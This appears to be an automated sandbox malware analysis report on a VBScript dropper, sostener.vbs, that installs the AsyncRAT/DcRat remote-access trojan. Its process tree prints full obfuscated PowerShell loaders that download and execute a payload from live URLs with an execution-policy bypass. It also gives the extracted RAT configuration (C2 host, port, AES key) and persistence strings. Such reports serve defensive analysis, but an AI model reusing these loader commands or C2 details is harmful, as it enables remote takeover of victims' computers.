Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name:sostener.vbs
Analysis ID:1519308
MD5:7038e85f1e6e6405981b64ff58358482
SHA1:9df67362f01d7a33a02a708fa6da1c3a1214fc51
SHA256:a1a8e23d2f66e05da76366469a1a344973fb1d775a943656de0f90bf0306e447
Tags:vbsuser-lontze7
Infos:

Detection

AsyncRAT, DcRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6192 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6572 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 5824 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • powershell.exe (PID: 7280 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' " MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7476 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7700 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 7988 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 4476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 7996 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8008 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • RegSvcs.exe (PID: 3872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • powershell.exe (PID: 8124 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' " MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7524 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7480 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 5376 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 7712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 2232 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 6448 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • RegSvcs.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • RegSvcs.exe (PID: 7484 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
{"Server": "dcmxz.duckdns.org", "Ports": "35650", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "BMaxyTI6PFcknz46fW6SoamkbMkpDOBY", "Mutex": "DcRatMutex_qwqdanchun", "Certificate": "MIICMDCCAZmgAwIBAgIVAIhNlmebb6nSe6ECHjMpYKJ1i7gvMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIxMDEyODA1MzU1N1oXDTMxMTEwNzA1MzU1N1owEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALz18kcXxyYRNtzNciIOitqVEEKYOOJZOGjSaWOLKz3M/Df8QpKzt86Y+GK3639BYF/OzJ6i8PyJcI4jCe+L56ytnlJDfAYTzg7df+pvpE6bSgYYgBSEMcKBPrpx6bV5z/V8FOCVqlt9xfM47rHzIs6kOkc0Xu0TqFGxVfi3Koj/AgMBAAGjMjAwMB0GA1UdDgQWBBQOZShjgdZ92lUVGT5AalbF4rcBrDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBABuRWEmIgb/BjPElBrcq4LuUTHLBWgnJN3yXXtFA+Nl/+mYto5FZMUmzz3mbjKRHuzo79jdei4h1vSO9+2gTFWw1mY8HoeEoyL0YExBQMCoUPjpLJEuAydiWBMXXBmv0zPzE3W7zhG6DRe8pXQkZ2yu8c9G4KxXS1ITmSrlJqBQ6", "ServerSignature": "HHE5jOeVJOhAghvpojlJdIrDbFOsUbqwsp+EMG8VXpAUEeevWIZdvf0JXY09IqtRyF0X8OflaZjfz5GSeKAlhnZylZ4ewd/rQNkxEX2jmNQvqQm2VUSZ4DaZ1LNcyuuDLoLokVBSqAQ26qID63vTRTGCG+S4ivbzXv2B1m+Pq9M=", "BDOS": "null", "External_config_on_Pastebin": "false"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x31032:$b2: DcRat By qwqdanchun1
SourceRuleDescriptionAuthorStrings
0000001A.00000002.2343267450.0000000001509000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0xc784:$b2: DcRat By qwqdanchun1
00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
    • 0x1726:$h2: //:sptth
    • 0xfc1:$s1: DownloadString
    • 0xe27:$s2: StrReverse
    • 0xfb0:$s3: FromBase64String
    • 0x1237:$s4: WebClient
    00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x1a797:$a1: havecamera
      • 0x2685f:$a1: havecamera
      • 0x1dc90:$a2: timeout 3 > NUL
      • 0x29d58:$a2: timeout 3 > NUL
      • 0x1dcb0:$a3: START "" "
      • 0x29d78:$a3: START "" "
      • 0x1db3b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
      • 0x29c03:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
      • 0x1dbf0:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
      • 0x29cb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
      Click to see the 28 entries
      SourceRuleDescriptionAuthorStrings
      4.2.powershell.exe.155dc4f0000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        4.2.powershell.exe.155dc4f0000.4.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
        • 0x1726:$h2: //:sptth
        • 0xfc1:$s1: DownloadString
        • 0xe27:$s2: StrReverse
        • 0xfb0:$s3: FromBase64String
        • 0x1237:$s4: WebClient
        26.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          26.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_DCRat_1aeea1acunknownunknown
          • 0x65f7:$a1: havecamera
          • 0x9af0:$a2: timeout 3 > NUL
          • 0x9b10:$a3: START "" "
          • 0x999b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
          • 0x9a50:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
          26.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
          • 0x9a50:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
          • 0x999b:$s2: L2Mgc2NodGFza3MgL2
          • 0x991a:$s3: QW1zaVNjYW5CdWZmZXI
          • 0x9968:$s4: VmlydHVhbFByb3RlY3Q
          Click to see the 55 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_6644.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_7896.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7728.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x 